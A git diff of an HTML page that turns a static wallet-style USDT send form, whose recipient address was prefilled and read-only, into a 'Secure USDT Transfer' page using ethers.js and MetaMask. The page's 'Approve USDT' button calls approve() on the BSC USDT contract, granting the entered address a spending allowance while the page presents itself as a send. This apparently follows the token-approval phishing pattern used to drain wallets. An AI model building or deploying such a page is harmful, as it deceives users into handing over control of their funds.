--- a/index.html
+++ b/index.html
@@ -1,100 +1,88 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>USDT Transfer</title>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Send USDT</title>
+  <script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.min.js"></script>
   <style>
     body {
-      margin: 0;
-      background-color: #111;
+      background-color: #121212;
       color: white;
       font-family: Arial, sans-serif;
-      display: flex;
-      flex-direction: column;
-      align-items: center;
-      padding: 40px 20px;
+      padding: 30px;
     }
-
-    .container {
+    input, button {
       width: 100%;
-      max-width: 400px;
-      background-color: #1e1e1e;
-      padding: 25px;
-      border-radius: 15px;
-      box-shadow: 0 0 15px rgba(0,0,0,0.6);
-    }
-
-    label {
-      font-size: 14px;
-      margin-bottom: 5px;
-      display: block;
-    }
-
-    .input-group {
-      background: #2a2a2a;
+      padding: 15px;
+      margin: 10px 0;
       border-radius: 10px;
-      display: flex;
-      align-items: center;
-      margin-bottom: 20px;
-      padding: 10px;
-      color: #ccc;
-    }
-
-    .input-group input {
-      background: transparent;
       border: none;
-      color: white;
-      flex: 1;
       font-size: 16px;
-      padding: 5px;
-      outline: none;
     }
-
-    .input-group .right {
-      font-size: 14px;
-      color: #0f0;
-      margin-left: 10px;
+    input {
+      background-color: #2b2b2b;
+      color: white;
+    }
+    button {
+      background-color: #1db954;
+      color: white;
       cursor: pointer;
     }
-
-    .amount-hint {
-      color: gray;
-      font-size: 12px;
-      margin-top: -15px;
-      margin-bottom: 25px;
-      text-align: right;
-    }
-
-    .btn {
-      width: 100%;
-      padding: 12px;
-      border: none;
-      border-radius: 25px;
-      font-size: 16px;
-      font-weight: bold;
-      background-color: #333;
-      color: gray;
-      cursor: not-allowed;
+    button:disabled {
+      background-color: #555;
     }
   </style>
 </head>
 <body>
-  <div class="container">
-    <label>Address or Domain Name</label>
-    <div class="input-group">
-      <input type="text" value="0xB7333cd4E52D665156eA00c6..." readonly>
-      <div class="right">Paste</div>
-    </div>
 
-    <label>Amount</label>
-    <div class="input-group">
-      <input type="number" placeholder="USDT Amount">
-      <div class="right">Max</div>
-    </div>
+  <h2>🟢 Secure USDT Transfer</h2>
 
-    <div class="amount-hint">= $0.00</div>
+  <input type="text" id="address" placeholder="0x... Wallet Address" />
+  <input type="number" id="amount" placeholder="USDT Amount" />
 
-    <button class="btn">Next</button>
-  </div>
+  <button onclick="connect()">Connect Wallet</button>
+  <button onclick="sendUSDT()">Approve USDT</button>
+
+  <script>
+    const usdtAddress = "0x55d398326f99059fF775485246999027B3197955"; // BSC USDT
+    const abi = [
+      "function approve(address spender, uint256 amount) public returns (bool)"
+    ];
+
+    let provider, signer;
+
+    async function connect() {
+      if (typeof window.ethereum === 'undefined') {
+        alert('Install MetaMask!');
+        return;
+      }
+
+      provider = new ethers.providers.Web3Provider(window.ethereum);
+      await provider.send("eth_requestAccounts", []);
+      signer = provider.getSigner();
+      alert("Wallet connected!");
+    }
+
+    async function sendUSDT() {
+      if (!signer) return alert("Connect wallet first.");
+
+      const receiver = document.getElementById("address").value;
+      const amount = document.getElementById("amount").value;
+
+      if (!receiver || !amount) return alert("Please fill both fields.");
+
+      const usdt = new ethers.Contract(usdtAddress, abi, signer);
+      const parsedAmount = ethers.utils.parseUnits(amount, 18); // USDT usually has 18 decimals on BSC
+
+      try {
+        const tx = await usdt.approve(receiver, parsedAmount);
+        alert("Approval Sent! TX: " + tx.hash);
+      } catch (err) {
+        alert("Error: " + err.message);
+      }
+    }
+  </script>
+
 </body>
 </html>
